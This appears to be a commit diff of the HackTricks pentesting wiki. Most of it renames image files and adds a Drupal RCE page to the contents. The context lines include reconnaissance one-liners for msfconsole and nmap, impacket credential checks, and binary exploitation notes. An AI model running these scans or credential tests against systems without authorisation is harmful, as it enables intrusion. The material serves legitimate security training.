GITBOOK-4331: No subject
Before Width: | Height: | Size: 5.5 KiB After Width: | Height: | Size: 1.6 KiB |
Before Width: | Height: | Size: 1.6 KiB After Width: | Height: | Size: 32 KiB |
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 142 KiB |
Before Width: | Height: | Size: 12 KiB After Width: | Height: | Size: 708 KiB |
Before Width: | Height: | Size: 708 KiB After Width: | Height: | Size: 287 KiB |
Before Width: | Height: | Size: 57 KiB After Width: | Height: | Size: 201 KiB |
Before Width: | Height: | Size: 201 KiB After Width: | Height: | Size: 197 KiB |
Before Width: | Height: | Size: 137 KiB After Width: | Height: | Size: 79 KiB |
Before Width: | Height: | Size: 79 KiB After Width: | Height: | Size: 609 KiB |
Before Width: | Height: | Size: 43 KiB After Width: | Height: | Size: 43 KiB |
Before Width: | Height: | Size: 43 KiB After Width: | Height: | Size: 137 KiB |
Before Width: | Height: | Size: 160 KiB After Width: | Height: | Size: 15 KiB |
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 1.3 MiB |
Before Width: | Height: | Size: 148 KiB After Width: | Height: | Size: 15 KiB |
Before Width: | Height: | Size: 15 KiB After Width: | Height: | Size: 428 KiB |
Before Width: | Height: | Size: 150 KiB After Width: | Height: | Size: 43 KiB |
Before Width: | Height: | Size: 43 KiB After Width: | Height: | Size: 78 KiB |
Before Width: | Height: | Size: 33 KiB After Width: | Height: | Size: 42 KiB |
Before Width: | Height: | Size: 42 KiB After Width: | Height: | Size: 92 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 33 KiB |
Before Width: | Height: | Size: 33 KiB After Width: | Height: | Size: 116 KiB |
Before Width: | Height: | Size: 1 MiB After Width: | Height: | Size: 74 KiB |
Before Width: | Height: | Size: 74 KiB After Width: | Height: | Size: 271 KiB |
Before Width: | Height: | Size: 56 KiB After Width: | Height: | Size: 254 KiB |
Before Width: | Height: | Size: 254 KiB After Width: | Height: | Size: 5.5 KiB |
Before Width: | Height: | Size: 5.5 KiB After Width: | Height: | Size: 254 KiB |
Before Width: | Height: | Size: 111 KiB After Width: | Height: | Size: 3.2 MiB |
Before Width: | Height: | Size: 3.2 MiB After Width: | Height: | Size: 10 KiB |
Before Width: | Height: | Size: 10 KiB After Width: | Height: | Size: 262 KiB |
Before Width: | Height: | Size: 111 KiB After Width: | Height: | Size: 407 KiB |
Before Width: | Height: | Size: 407 KiB After Width: | Height: | Size: 284 KiB |
Before Width: | Height: | Size: 7.5 KiB After Width: | Height: | Size: 175 KiB |
Before Width: | Height: | Size: 175 KiB After Width: | Height: | Size: 453 KiB |
Before Width: | Height: | Size: 23 KiB After Width: | Height: | Size: 172 KiB |
Before Width: | Height: | Size: 172 KiB After Width: | Height: | Size: 210 KiB |
Before Width: | Height: | Size: 165 KiB After Width: | Height: | Size: 1 MiB |
Before Width: | Height: | Size: 1 MiB After Width: | Height: | Size: 594 KiB |
Before Width: | Height: | Size: 92 KiB After Width: | Height: | Size: 112 KiB |
|
@ -79,7 +79,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
|
||||||
|
|
||||||
### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
|
### [Pentest-Tools.com](https://pentest-tools.com/) - The essential penetration testing toolkit
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/image (15).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/image (15) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -89,7 +89,7 @@ Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to
|
||||||
|
|
||||||
### [SerpApi](https://serpapi.com/)
|
### [SerpApi](https://serpapi.com/)
|
||||||
|
|
||||||
<figure><img src=".gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src=".gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
|
SerpApi offers fast and easy real-time APIs to **access search engine results**. They scrape search engines, handle proxies, solve captchas, and parse all rich structured data for you.
|
||||||
|
|
||||||
|
|
|
@ -373,7 +373,8 @@
|
||||||
* [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md)
|
* [Firebase Database](network-services-pentesting/pentesting-web/buckets/firebase-database.md)
|
||||||
* [CGI](network-services-pentesting/pentesting-web/cgi.md)
|
* [CGI](network-services-pentesting/pentesting-web/cgi.md)
|
||||||
* [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md)
|
* [DotNetNuke (DNN)](network-services-pentesting/pentesting-web/dotnetnuke-dnn.md)
|
||||||
* [Drupal](network-services-pentesting/pentesting-web/drupal.md)
|
* [Drupal](network-services-pentesting/pentesting-web/drupal/README.md)
|
||||||
|
* [Drupal RCE](network-services-pentesting/pentesting-web/drupal/drupal-rce.md)
|
||||||
* [Electron Desktop Apps](network-services-pentesting/pentesting-web/electron-desktop-apps/README.md)
|
* [Electron Desktop Apps](network-services-pentesting/pentesting-web/electron-desktop-apps/README.md)
|
||||||
* [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
|
* [Electron contextIsolation RCE via preload code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-preload-code.md)
|
||||||
* [Electron contextIsolation RCE via Electron internal code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md)
|
* [Electron contextIsolation RCE via Electron internal code](network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md)
|
||||||
|
|
|
@ -40,7 +40,7 @@ This gadget basically allows to confirm that something interesting was executed
|
||||||
|
|
||||||
This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
|
This technique uses the [**ret2csu**](ret2csu.md) gadget. And this is because if you access this gadget in the middle of some instructions you get gadgets to control **`rsi`** and **`rdi`**:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt="" width="278"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
|
||||||
|
|
||||||
These would be the gadgets:
|
These would be the gadgets:
|
||||||
|
|
||||||
|
|
|
@ -87,7 +87,7 @@ gef➤ search-pattern 0x400560
|
||||||
|
|
||||||
Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
|
Another way to control **`rdi`** and **`rsi`** from the ret2csu gadget is by accessing it specific offsets:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (2).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (2) (1).png" alt="" width="283"><figcaption><p><a href="https://www.scs.stanford.edu/brop/bittau-brop.pdf">https://www.scs.stanford.edu/brop/bittau-brop.pdf</a></p></figcaption></figure>
|
||||||
|
|
||||||
Check this page for more info:
|
Check this page for more info:
|
||||||
|
|
||||||
|
|
|
@ -156,7 +156,7 @@ int main(int argc, char **argv) {
|
||||||
|
|
||||||
In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**:
|
In the section **`vdso`** it's possible to find a call to **`sigreturn`** in the offset **`0x7b0`**:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image.png" alt="" width="563"><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (17).png" alt="" width="563"><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it:
|
Therefore, if leaked, it's possible to **use this address to access a `sigreturn`** if the binary isn't loading it:
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -730,7 +730,7 @@ There are several tools out there that will perform part of the proposed actions
|
||||||
|
|
||||||
* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
|
* All free courses of [**@Jhaddix**](https://twitter.com/Jhaddix) like [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -150,7 +150,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
|
||||||
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
|
* [**CBC-MAC**](../crypto-and-stego/cipher-block-chaining-cbc-mac-priv.md)
|
||||||
* [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
|
* [**Padding Oracle**](../crypto-and-stego/padding-oracle-priv.md)
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -133,7 +133,7 @@ However, in this kind of containers these protections will usually exist, but yo
|
||||||
|
|
||||||
You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
|
You can find **examples** on how to **exploit some RCE vulnerabilities** to get scripting languages **reverse shells** and execute binaries from memory in [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE).
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -201,7 +201,7 @@ dig google.com A @<IP>
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (146).png>)
|
![](<../.gitbook/assets/image (146).png>)
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -322,7 +322,7 @@ Entry_6:
|
||||||
Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'
|
Command: msfconsole -q -x 'use auxiliary/scanner/dns/dns_amp; set RHOSTS {IP}; set RPORT 53; run; exit' && msfconsole -q -x 'use auxiliary/gather/enum_dns; set RHOSTS {IP}; set RPORT 53; run; exit'
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -75,7 +75,7 @@ rdp\_check.py from impacket let you check if some credentials are valid for a RD
|
||||||
rdp_check <domain>/<name>:<password>@<IP>
|
rdp_check <domain>/<name>:<password>@<IP>
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -168,7 +168,7 @@ Entry_2:
|
||||||
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
|
Command: nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 {IP}
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -199,7 +199,7 @@ RemoteCmd()
|
||||||
```
|
```
|
||||||
{% endcode %}
|
{% endcode %}
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -188,7 +188,7 @@ smtp-user-enum: smtp-user-enum -M <MODE> -u <USER> -t <IP>
|
||||||
Nmap: nmap --script smtp-enum-users <IP>
|
Nmap: nmap --script smtp-enum-users <IP>
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -625,7 +625,7 @@ Entry_8:
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -61,7 +61,7 @@ It’s a client’s request for some information that can be useful for the a su
|
||||||
**QUIT**\
|
**QUIT**\
|
||||||
It terminates the SMTP conversation.
|
It terminates the SMTP conversation.
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
|
|
@ -22,7 +22,7 @@ This type of vulnerability was [**originally discovered in this post**](https://
|
||||||
|
|
||||||
This is because in the SMTP protocol, the **data of the message** to be sent in the email is controlled by a user (attacker) which could send specially crafted data abusing differences in parsers that will smuggle extra emails in the receptor. Take a look to this illustrated example from the original post:
|
This is because in the SMTP protocol, the **data of the message** to be sent in the email is controlled by a user (attacker) which could send specially crafted data abusing differences in parsers that will smuggle extra emails in the receptor. Take a look to this illustrated example from the original post:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (8).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (8) (1).png" alt=""><figcaption><p><a href="https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png">https://sec-consult.com/fileadmin/user_upload/sec-consult/Dynamisch/Blogartikel/2023_12/SMTP_Smuggling-Overview__09_.png</a></p></figcaption></figure>
|
||||||
|
|
||||||
### How
|
### How
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -260,7 +260,7 @@ If there is an ACL that only allows some IPs to query the SMNP service, you can
|
||||||
* snmpd.conf
|
* snmpd.conf
|
||||||
* snmp-config.xml
|
* snmp-config.xml
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -12,7 +12,7 @@
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
@ -53,7 +53,7 @@ msf6 auxiliary(scanner/snmp/snmp_enum) > exploit
|
||||||
|
|
||||||
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||||
|
|
||||||
|
|
|
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
|
||||||
|
|
||||||
|
@ -94,7 +94,7 @@ Entry_4:
|
||||||
|
|
||||||
```
|
```
|
||||||
|
|
||||||
